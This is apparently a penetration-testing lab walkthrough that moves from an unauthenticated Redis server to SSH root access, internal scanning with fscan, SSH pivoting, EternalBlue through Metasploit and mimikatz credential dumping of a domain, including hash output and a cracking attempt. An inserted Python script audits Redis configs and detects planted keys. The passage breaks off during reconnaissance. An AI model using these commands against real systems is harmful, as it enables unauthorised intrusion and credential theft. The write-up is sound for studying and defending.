I. Lab information
II. Information gathering
TCP port scan + service fingerprinting + OS detection:
- sudo rustscan -a 192.168.111.20 -r 1-65535 -- -sV -O -Pn -n -oA TCP_PORTS_NAMP
Output (partial):
- PORT STATE SERVICE REASON VERSION
- 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
- 80/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
- 81/tcp open http syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
- 6379/tcp open redis syn-ack ttl 63 Redis key-value store 2.8.17
Key information:
- OS: Ubuntu
- Port 6379: a very old Redis release; with default settings there is a high chance of unauthenticated access
UDP port scan + service fingerprinting:
- sudo nmap -sV -sU --top-ports 20 192.168.111.20 -Pn -n -oA UDP_TOP20_PORTS
In the scan results every port is either closed or open|filtered, which gives little useful information.
Approach: work through the TCP ports first; if they give no foothold, come back to the UDP ports and probe them with dedicated tools.
Putting this together, port 6379 is the top priority, followed by the two HTTP services on 80 and 81.
III. Redis unauthenticated access
In an old Redis release such as 2.8:
- the default listen address is 0.0.0.0 (open on every network interface)
- no password is set (requirepass is empty)
- the protected-mode safeguard was only introduced in 3.2; 2.8 does not have it at all
- lab environments are usually not hardened with extra firewall rules or configuration
protected-mode is a default safeguard introduced in Redis 3.2. In short: when Redis has no password (requirepass empty) and is not explicitly bound to local access only (bind 127.0.0.1), it automatically rejects all connections from external networks and only accepts connections from localhost.
Try logging in without a password:
- redis-cli -h 192.168.111.20 -p 6379
Login successful:
A quick round of information gathering with the following commands:
- ping: confirms the connection is really established
- info: Redis version, OS, memory, number of connected clients, etc.
- client list: IPs and ports of all connected clients
- config get dbfilename: current RDB file name
- config get dir: current RDB persistence directory
Key information:
- redis_version:2.8.17
- os:Linux 5.4.0-66-generic x86_64
- dbfilename dump.rdb
- dir /root
- rdb_last_save_time:1775801194
- rdb_last_bgsave_status:ok
The RDB persistence directory is set to /root, and rdb_last_save_time together with rdb_last_bgsave_status:ok show that Redis has not only been pointed at that directory but has successfully written into it.
We know that /root has mode 700, so only the root user can write to it.
Therefore we can confirm that this Redis instance runs as root.
Since the earlier port scan showed port 22 open, the main objective now is: write an SSH public key through Redis -> connect over SSH.
Generate an SSH key pair on Kali:
- ssh-keygen -t rsa -f ./target
Read the public key:
- ❯ cat target.pub
- ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDYrIRFtsijwuU43JeBFUwC04tSP3jNnl3ujMwgOO7FIOaDe0c7Wsp+qk/vpSKfhnTfyPAmHrO5q58zbDuFCzBrQrUNxUXVXJaO6k8csJ2VuPBh5YN7W61q9Cs62BacSX9QHDv+EhCkewVW2O3oGWbvWODnQh8tbwV815HyP15hlIXrisEp9DHWqhvz2scKYcVPw38g31yUJkcMU4T83yMziBSIKgDi/6+RB7JsJXZ+x72QAQtFes6JHYDl1Z3NQmPCdesww/Bx0hwXOx3d9LJAtpV9WIPMVbK05bMlwdDs321yX060WZOJwrQBgG2gqLNANjjouOIJlyrHLNRt5QfACNkFWNehWtckYLtV1/03cF02medJ/IJMt1yokLo/O2hcG0NK8vOxbUbcBrXUfHxHUWSUYwyag7L0SYctycjCi7lIXze8UhTf7C8oT7fPPzRiuoEu6KRuxXCxEJEOBa928iD/OhLu0JlVf+W2NrAnw3zJZJjh9ckHhATu+oFagg0= zyf@kali
Back in redis-cli, write the public key into a key:
- SET pubkey "\n\nssh-rsa <contents of target.pub> zyf@kali\n\n"
Set the directory:
- CONFIG SET dir /root/.ssh/
Set the save file name:
- CONFIG SET dbfilename authorized_keys
- SAVE
Note: writing via CONFIG SET dir + dbfilename followed by SAVE is an overwrite. Redis generates a brand-new RDB binary snapshot that replaces the target file (here /root/.ssh/authorized_keys) entirely, rather than appending to its existing content. The reason for the \n newlines around the public key is that RDB is a binary format: the file begins with the fixed "REDIS" magic string plus a version number, metadata and other binary junk, and only then comes the pubkey value that was SET. Without the newlines the key string would be glued to that binary junk in one long line like "[binary garbage]ssh-rsa AAA...", which sshd treats as an invalid line and ignores when parsing authorized_keys, so the key would never take effect.
Try the SSH login:
- ssh root@192.168.111.20 -i ./target
Login successful.
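As an added example (not part of the original write-up), the Python below covers both points of this section from the defender's side: it audits the Redis settings the checklist names (requirepass, bind, protected-mode, CONFIG renaming) and it recognises an authorized_keys file produced by a Redis SAVE, including the glued-key case the note describes. All sample data is constructed and the key strings are fake placeholders.

```python
"""Detect Redis-written authorized_keys files and audit a redis.conf.

Added example, not from the original write-up. Sample data is constructed;
the key strings are fake placeholders, not real keys.
"""
import re

RDB_MAGIC = b"REDIS"
# A line sshd would accept: key type, base64 blob, optional comment.
KEY_LINE = re.compile(
    rb"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp(256|384|521)) "
    rb"[A-Za-z0-9+/]+=*( .*)?$"
)


def analyse_authorized_keys(data: bytes) -> dict:
    """Classify the raw bytes of an authorized_keys file.

    A file written by CONFIG SET dir/dbfilename + SAVE starts with the RDB
    header ("REDIS" + 4-digit version) and carries binary metadata; only a
    key that sits on its own line (the "\\n\\n" padding) is usable by sshd.
    """
    is_rdb = data.startswith(RDB_MAGIC)
    rdb_version = int(data[5:9]) if is_rdb and data[5:9].isdigit() else None
    valid_keys, glued_keys = [], 0
    for line in data.split(b"\n"):
        if KEY_LINE.match(line):
            valid_keys.append(line.decode("ascii"))
        elif b"ssh-" in line or b"ecdsa-" in line:
            # Key text stuck to binary junk: sshd ignores it, but it is
            # still evidence that someone tried to plant a key.
            glued_keys += 1
    binary = sum(1 for b in data if b < 9 or 13 < b < 32 or b > 126)
    return {
        "rdb_snapshot": is_rdb,
        "rdb_version": rdb_version,
        "valid_keys": valid_keys,
        "glued_keys": glued_keys,
        "binary_ratio": binary / len(data) if data else 0.0,
    }


def audit_redis_config(config_text: str) -> list:
    """Return findings for a redis.conf, following the section's checklist."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            settings.setdefault(key, []).append(value.strip())
    findings = []
    if not settings.get("requirepass") or settings["requirepass"][-1] in ("", '""'):
        findings.append("no requirepass: unauthenticated access")
    binds = settings.get("bind", [])
    if not binds or any("0.0.0.0" in b for b in binds):
        findings.append("bind missing or 0.0.0.0: listens on all interfaces")
    if settings.get("protected-mode", ["no"])[-1].lower() != "yes":
        findings.append("protected-mode off or unsupported (Redis < 3.2)")
    if not any(v.startswith("CONFIG ") for v in settings.get("rename-command", [])):
        findings.append("CONFIG not renamed: dir/dbfilename changeable remotely")
    return findings


# --- constructed samples -------------------------------------------------
_KEY = b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABfakeKeyMaterial zyf@kali"
_PADDED = b"\n\n" + _KEY + b"\n\n"
# Layout mimics a Redis 2.8 (RDB version 6) dump of one string key "pubkey":
# header, db selector, type byte, key, length-prefixed value, EOF, checksum.
_RDB_PREFIX = b"REDIS0006\xfe\x00\x00\x06pubkey"
_RDB_SUFFIX = b"\xff" + b"\x00" * 8
SAMPLE_PLANTED = _RDB_PREFIX + bytes([len(_PADDED)]) + _PADDED + _RDB_SUFFIX
SAMPLE_GLUED = _RDB_PREFIX + bytes([len(_KEY)]) + _KEY + _RDB_SUFFIX
SAMPLE_CLEAN = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIfakeKeyMaterial admin@host\n"

SAMPLE_WEAK_CONF = "bind 0.0.0.0\nport 6379\ndir /root\n"
SAMPLE_HARDENED_CONF = (
    "bind 127.0.0.1\nport 6379\nprotected-mode yes\n"
    'requirepass "CHANGE-ME-long-random-secret"\n'
    'rename-command CONFIG ""\ndir /var/lib/redis\n'
)

if __name__ == "__main__":
    for name, sample in (("planted", SAMPLE_PLANTED),
                         ("glued", SAMPLE_GLUED), ("clean", SAMPLE_CLEAN)):
        print(name, analyse_authorized_keys(sample))
    print("weak:", audit_redis_config(SAMPLE_WEAK_CONF))
    print("hardened:", audit_redis_config(SAMPLE_HARDENED_CONF))
```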
IV. Ubuntu information gathering
Start with the native commands:
- root@ubuntu:~# ip addr
- 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
- link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
- inet 127.0.0.1/8 scope host lo
- valid_lft forever preferred_lft forever
- inet6 ::1/128 scope host
- valid_lft forever preferred_lft forever
- 2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
- link/ether 00:50:56:b1:41:a3 brd ff:ff:ff:ff:ff:ff
- inet 192.168.111.20/24 brd 192.168.111.255 scope global ens33
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:41a3/64 scope link
- valid_lft forever preferred_lft forever
- 3: ens38: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
- link/ether 00:50:56:b1:f7:eb brd ff:ff:ff:ff:ff:ff
- inet 192.168.52.10/24 brd 192.168.52.255 scope global ens38
- valid_lft forever preferred_lft forever
- inet6 fe80::250:56ff:feb1:f7eb/64 scope link
- valid_lft forever preferred_lft forever
Two NICs:
- External: 192.168.111.20
- Internal: 192.168.52.10
- Internal subnet: 192.168.52.0/24
- root@ubuntu:~# cat /proc/version
- Linux version 5.4.0-66-generic (buildd@lgw01-amd64-016) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021
- root@ubuntu:~# cat /etc/os-release
- NAME="Ubuntu"
- VERSION="18.04.5 LTS (Bionic Beaver)"
- ID=ubuntu
- ID_LIKE=debian
- PRETTY_NAME="Ubuntu 18.04.5 LTS"
- VERSION_ID="18.04"
- HOME_URL="https://www.ubuntu.com/"
- SUPPORT_URL="https://help.ubuntu.com/"
- BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
- PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
- VERSION_CODENAME=bionic
- UBUNTU_CODENAME=bionic
- root@ubuntu:~# hostname && cat /etc/issue && uname -a && cat /etc/hosts
- ubuntu
- Ubuntu 18.04.5 LTS \n \l
- Linux ubuntu 5.4.0-66-generic #74~18.04.2-Ubuntu SMP Fri Feb 5 11:17:31 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
- 127.0.0.1 localhost
- 127.0.1.1 ubuntu
- 47.101.57.72 whoamianony.top
- 127.0.0.1 www.whopen.com
- # The following lines are desirable for IPv6 capable hosts
- ::1 ip6-localhost ip6-loopback
- fe00::0 ip6-localnet
- ff00::0 ip6-mcastprefix
- ff02::1 ip6-allnodes
- ff02::2 ip6-allrouters
Routing information:
- root@ubuntu:~# ip route show
- 192.168.52.0/24 dev ens38 proto kernel scope link src 192.168.52.10
- 192.168.111.0/24 dev ens33 proto kernel scope link src 192.168.111.20
This shows a directly connected internal network.
Check the ARP cache:
- root@ubuntu:~# ip neigh
- 192.168.52.20 dev ens38 lladdr 00:50:56:b1:7e:66 STALE
- 192.168.111.25 dev ens33 lladdr 00:50:56:b1:87:ea REACHABLE
A new internal host (192.168.52.20) is found right away:
Check the firewall (iptables / ufw):
- root@ubuntu:~# iptables -L -v -n 2>/dev/null
- Chain INPUT (policy ACCEPT 71 packets, 4966 bytes)
- pkts bytes target prot opt in out source destination
- Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
- pkts bytes target prot opt in out source destination
- Chain OUTPUT (policy ACCEPT 66 packets, 5906 bytes)
- pkts bytes target prot opt in out source destination
- root@ubuntu:~# ufw status 2>/dev/null
- Status: inactive
No firewall; traffic in and out is unrestricted.
The next step is internal network reconnaissance.
V. Fscan
Upload fscan to the server with scp and start the internal reconnaissance:
- scp -i target /usr/local/bin/fscan root@192.168.111.20:/tmp/
After the upload, scan directly:
- ./fscan -h 192.168.52.0/24
I forgot to exclude the local host from the scan 😛, so it took a bit longer. You can use:
- ./fscan -h 192.168.52.0/24 -hn 192.168.52.10
to exclude the local host.
Result:
- start infoscan
- (icmp) Target 192.168.52.10 is alive
- (icmp) Target 192.168.52.20 is alive
- (icmp) Target 192.168.52.30 is alive
- [*] Icmp alive hosts len is: 3
- 192.168.52.10:81 open
- 192.168.52.10:80 open
- 192.168.52.20:22 open
- 192.168.52.10:22 open
- 192.168.52.30:135 open
- 192.168.52.30:445 open
- 192.168.52.30:139 open
- 192.168.52.10:6379 open
- 192.168.52.30:8080 open
- 192.168.52.20:8000 open
- [*] alive ports len is: 10
- start vulscan
- [*] WebTitle http://192.168.52.10 code:502 len:584 title:502 Bad Gateway
- [*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
- [+] InfoScan http://192.168.52.30:8080 [通达OA]
- [*] WebTitle http://192.168.52.10:81 code:200 len:17474 title:Laravel
- [*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.52.20:8000 [Laravel]
- [+] InfoScan http://192.168.52.10:81 [Laravel]
- [+] PocScan http://192.168.52.30:8080 tongda-user-session-disclosure
- [+] Redis 192.168.52.10:6379 unauthorized file:/root/.ssh/authorized_keys
- [+] Redis 192.168.52.10:6379 like can write /root/.ssh/
- [+] Redis 192.168.52.10:6379 like can write /var/spool/cron/
- [+] PocScan http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129
- [+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
- [+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
- 已完成 8/10 [-] ssh 192.168.52.10:22 root Aa1234. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 8/10 [-] ssh 192.168.52.10:22 admin Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 8/10 [-] ssh 192.168.52.10:22 admin 1qaz2wsx ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 10/10
- [*] 扫描结束,耗时: 7m12.740113763s
Forgetting to exclude the local host was of course a mistake, but it also showed how handy fscan is: everything I had worked out by hand earlier came out of a single fscan run. That said, this depends on its fingerprint and vulnerability databases and will not cover every environment.
Let me organise the information:
1) 192.168.52.20
Open ports and related fingerprints:
- 192.168.52.20:22 open
- 192.168.52.20:8000 open
- [*] WebTitle http://192.168.52.20:8000 code:200 len:17474 title:Laravel
- [+] InfoScan http://192.168.52.20:8000 [Laravel]
The tool directly flagged a CVE:
- [+] PocScan http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129
The tool also ran a weak-password brute force against port 22, without success:
- 已完成 9/10 [-] ssh 192.168.52.20:22 root root@111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 9/10 [-] ssh 192.168.52.20:22 root 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
- 已完成 10/10
2) 192.168.52.30
Open ports:
- 192.168.52.30:135 open
- 192.168.52.30:445 open
- 192.168.52.30:139 open
- 192.168.52.30:8080 open
Related fingerprints:
- [*] NetBios 192.168.52.30 PC1.whoamianony.org Windows 7 Professional 7601 Service Pack 1
- [*] WebTitle http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统
- [+] InfoScan http://192.168.52.30:8080 [通达OA]
- We can tell this is a domain environment:
- Domain name: whoamianony.org
- Hostname: PC1
- Port 8080 runs "通达OA网络智能办公系统" (Tongda OA), which may have n-day vulnerabilities
The scan also reports that this host is vulnerable to EternalBlue:
- [+] MS17-010 192.168.52.30 (Windows 7 Professional 7601 Service Pack 1)
In summary, the key information obtained:
VI. EternalBlue
MSF has a module for this, so EternalBlue can be attempted directly.
Before that, set up the proxy.
1) Setting up the proxy
Depending on whether the payload used later is reverse or bind, we choose a forward or a reverse proxy accordingly.
I chose "forward proxy + bind payload".
Create the SOCKS5 proxy:
- ssh -i target -D 1080 -N -C root@192.168.111.20
(For a reverse payload, remote port forwarding back to the attacker would be used instead:)
- ssh -i target -R 0.0.0.0:4444:localhost:4444 -R 0.0.0.0:6666:localhost:6666 root@192.168.111.20 -N
2) The ms17_010_eternalblue module
Bring up MSF:
Set the global proxy:
- setg Proxies socks5h://127.0.0.1:1080
Use the EternalBlue module:
- msf > use exploit/windows/smb/ms17_010_eternalblue
Choose the payload (make sure to pick a bind one):
- msf exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/bind_tcp
Set the required parameters:
- msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.30
Run the module:
It directly yields the highest privileges on the host:
3) Information gathering
(1) Network information
Gather the basic information:
- C:\Windows\system32>ipconfig /all
- ipconfig /all
- Windows IP Configuration
- Host Name . . . . . . . . . . . . : PC1
- Primary Dns Suffix . . . . . . . : whoamianony.org
- Node Type . . . . . . . . . . . . : Hybrid
- IP Routing Enabled. . . . . . . . : No
- WINS Proxy Enabled. . . . . . . . : No
- DNS Suffix Search List. . . . . . : whoamianony.org
- Ethernet adapter [unreadable name] 4:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
- Physical Address. . . . . . . . . : 00-50-56-B1-7F-9E
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::a48c:626e:c838:265%23(Preferred)
- IPv4 Address. . . . . . . . . . . : 192.168.93.20(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . :
- DHCPv6 IAID . . . . . . . . . . . : 721423401
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : 192.168.93.30
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Ethernet adapter Npcap Loopback Adapter:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Npcap Loopback Adapter
- Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
- DHCP Enabled. . . . . . . . . . . : Yes
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%22(Preferred)
- Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.0.0
- Default Gateway . . . . . . . . . :
- DHCPv6 IAID . . . . . . . . . . . : 268566604
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
- fec0:0:0:ffff::2%1
- fec0:0:0:ffff::3%1
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Ethernet adapter [unreadable name]:
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
- Physical Address. . . . . . . . . : 00-50-56-B1-54-16
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Link-local IPv6 Address . . . . . : fe80::858b:43d6:476c:6a3%11(Preferred)
- IPv4 Address. . . . . . . . . . . : 192.168.52.30(Preferred)
- Subnet Mask . . . . . . . . . . . : 255.255.255.0
- Default Gateway . . . . . . . . . : 192.168.52.2
- DHCPv6 IAID . . . . . . . . . . . : 234884137
- DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
- DNS Servers . . . . . . . . . . . : 192.168.52.2
- NetBIOS over Tcpip. . . . . . . . : Enabled
- Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Tunnel adapter isatap.{55ECD929-FBB2-4D96-B43D-8FFEB14A169F}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
- Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:
- Media State . . . . . . . . . . . : Media disconnected
- Connection-specific DNS Suffix . :
- Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
- Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
- DHCP Enabled. . . . . . . . . . . : No
- Autoconfiguration Enabled . . . . : Yes
This machine also has two NICs:
- 192.168.52.30
- 192.168.93.20
We also learn that the hostname is PC1 and the domain is whoamianony.org.
And from this line:
- DNS Servers . . . . . . . . . . . : 192.168.93.30
we can be fairly confident that the domain controller's IP is 192.168.93.30 (in a domain environment the DNS server is usually the DC).
(2) Confirming the domain controller
Confirm the conclusion above:
- C:\Windows\system32>chcp 65001
- chcp 65001
- Active code page: 65001
- C:\Windows\system32>net group "Domain Controllers" /domain
- net group "Domain Controllers" /domain
- The request will be processed at a domain controller for domain whoamianony.org.
- System error 5 has occurred.
- Access is denied.
A problem appears: I clearly have the highest privileges, yet access is denied?
Commands of the form net ... /domain do not query as the local SYSTEM identity; they use this host's computer account (machine account, e.g. WIN-XXXX$@whoamianony.org) to send LDAP/SAMR queries to the domain controller over the network.
Switch back to MSF and use its built-in domain enumeration module post/windows/gather/enum_domain.
Background the current session:
Check the id of the backgrounded session:
Use the module and set its options:
- msf exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/enum_domain
- msf post(windows/gather/enum_domain) > set session 1
- session => 1
Run it:
- msf post(windows/gather/enum_domain) > run
Result:
- [+] Domain FQDN: whoamianony.org
- [+] Domain NetBIOS Name: WHOAMIANONY
- [+] Domain Controller: DC.whoamianony.org (IP: 192.168.93.30)
- [*] Post module execution completed
The domain controller is DC.whoamianony.org (192.168.93.30).
(3) Routing information
Check whether the local routes can reach the domain controller:
- C:\Windows\system32>route print
- route print
- ===========================================================================
- Interface List
- 23...00 50 56 b1 7f 9e ......Intel(R) PRO/1000 MT Network Connection #2
- 22...02 00 4c 4f 4f 50 ......Npcap Loopback Adapter
- 11...00 50 56 b1 54 16 ......Intel(R) PRO/1000 MT Network Connection
- 1...........................Software Loopback Interface 1
- 12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
- 15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
- 16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
- ===========================================================================
- IPv4 Route Table
- ===========================================================================
- Active Routes:
- Network Destination Netmask Gateway Interface Metric
- 0.0.0.0 0.0.0.0 192.168.52.2 192.168.52.30 266
- 127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
- 127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
- 127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
- 169.254.0.0 255.255.0.0 On-link 169.254.129.186 286
- 169.254.129.186 255.255.255.255 On-link 169.254.129.186 286
- 169.254.255.255 255.255.255.255 On-link 169.254.129.186 286
- 192.168.52.0 255.255.255.0 On-link 192.168.52.30 266
- 192.168.52.30 255.255.255.255 On-link 192.168.52.30 266
- 192.168.52.255 255.255.255.255 On-link 192.168.52.30 266
- 192.168.93.0 255.255.255.0 On-link 192.168.93.20 266
- 192.168.93.20 255.255.255.255 On-link 192.168.93.20 266
- 192.168.93.255 255.255.255.255 On-link 192.168.93.20 266
- 224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
- 224.0.0.0 240.0.0.0 On-link 192.168.52.30 266
- 224.0.0.0 240.0.0.0 On-link 192.168.93.20 266
- 224.0.0.0 240.0.0.0 On-link 169.254.129.186 286
- 255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
- 255.255.255.255 255.255.255.255 On-link 192.168.52.30 266
- 255.255.255.255 255.255.255.255 On-link 192.168.93.20 266
- 255.255.255.255 255.255.255.255 On-link 169.254.129.186 286
- ===========================================================================
- Persistent Routes:
- Network Address Netmask Gateway Address Metric
- 0.0.0.0 0.0.0.0 192.168.52.2 Default
- ===========================================================================
- IPv6 Route Table
- ===========================================================================
- Active Routes:
- If Metric Network Destination Gateway
- 1 306 ::1/128 On-link
- 11 266 fe80::/64 On-link
- 23 266 fe80::/64 On-link
- 22 286 fe80::/64 On-link
- 11 266 fe80::858b:43d6:476c:6a3/128 On-link
- 23 266 fe80::a48c:626e:c838:265/128 On-link
- 22 286 fe80::b461:ccad:e30f:81ba/128 On-link
- 1 306 ff00::/8 On-link
- 11 266 ff00::/8 On-link
- 23 266 ff00::/8 On-link
- 22 286 ff00::/8 On-link
- ===========================================================================
- Persistent Routes:
- None
The routing table shows that this host can reach the domain controller directly.
(4) Credential harvesting
Collect credentials:
- meterpreter > load kiwi
- Loading extension kiwi...
- .#####. mimikatz 2.2.0 20191125 (x64/windows)
- .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
- ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
- ## \ / ## > http://blog.gentilkiwi.com/mimikatz
- '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
- '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
- Success.
- meterpreter > creds_all
- [+] Running as SYSTEM
- [*] Retrieving all credentials
- msv credentials
- ===============
- Username Domain NTLM SHA1
- -------- ------ ---- ----
- PC1$ WHOAMIANONY 3e6a3d8c713b4821eaa51aab25f52074 d8e1318a24c64b8fcc89dc8609b09af50342bacf
- wdigest credentials
- ===================
- Username Domain Password
- -------- ------ --------
- (null) (null) (null)
- PC1$ WHOAMIANONY %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
- kerberos credentials
- ====================
- Username Domain Password
- -------- ------ --------
- (null) (null) (null)
- pc1$ whoamianony.org %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
- pc1$ WHOAMIANONY.ORG %Yn!@ZW,eWz5>[!hh;H.(&n(yh^2YADmU*2bVx<N#yvw.9MTwmi;84''uRaucL)mw7I42S>sUE#r&u]vz6\/:5A.s5nLrko+zfn@])/"$V6?sDZel=f>[ol;
Only the credentials of this host's domain machine account were collected; no domain administrator account.
Try a few more commands (several credential-dumping commands were run here; only the useful one is shown):
- meterpreter > kiwi_cmd "lsadump::cache"
- Domain : PC1
- SysKey : fd4639f4e27c79683ae9fee56b44393f
- Local name : PC1 ( S-1-5-21-1982601180-2087634876-2293013296 )
- Domain name : WHOAMIANONY ( S-1-5-21-1315137663-3706837544-1429009142 )
- Domain FQDN : whoamianony.org
- Policy subsystem is : 1.11
- LSA Key(s) : 1, default {c4f0262f-f9ba-5833-89e5-1264beb97c37}
- [00] {c4f0262f-f9ba-5833-89e5-1264beb97c37} 12ec51d5510d2e28b5f273a98a547e21ceec081867af5348f219b08215f27558
- * Iteration is set to default (10240)
- [NL$1 - 2021/2/22 18:53:27]
- RID : 00000458 (1112)
- User : WHOAMIANONY\bunny
- MsCacheV2 : 00dd17d44798d1ac5f335365db696d1e
- [NL$2 - 2025/9/18 17:05:27]
- RID : 000001f4 (500)
- User : WHOAMIANONY\Administrator
- MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
Focus on:
- [NL$2 - 2025/9/18 17:05:27]
- RID : 000001f4 (500)
- User : WHOAMIANONY\Administrator
- MsCacheV2 : 2f44261182b156fe4e2cb03b39925b72
RID 500 is the fixed built-in domain administrator account in Active Directory (the Administrator account of any domain has RID 500).
MsCacheV2: a cached hash in Domain Cached Credentials v2 (DCC2) format.
Well-known RIDs:
- 500: Administrator (built-in administrator)
- 501: Guest
- 502: krbtgt (domain-controller specific)
- 512: Domain Admins group
We now know:
- Username: Administrator
- MsCacheV2: 2f44261182b156fe4e2cb03b39925b72
DCC2 cannot be used directly to log in; we can try cracking the hash locally (you can skip this; see "the big picture" below for why):
- echo '$DCC2$10240#Administrator#2f44261182b156fe4e2cb03b39925b72' > /tmp/dcc2.hash
- hashcat -m 2100 /tmp/dcc2.hash /usr/share/wordlists/rockyou.txt
The big picture: although lab passwords are usually simple, this one, Whoami2021, is not in rockyou, so it cannot be cracked this way...
4) Adjusting the approach
Update the lab diagram again:
Are there other machines in the domain?
Check PC1's ARP cache:
- C:\Windows\system32>arp -a
- arp -a
- Interface: 192.168.52.30 --- 0xb
- Internet Address Physical Address Type
- 192.168.52.10 00-50-56-b1-f7-eb dynamic
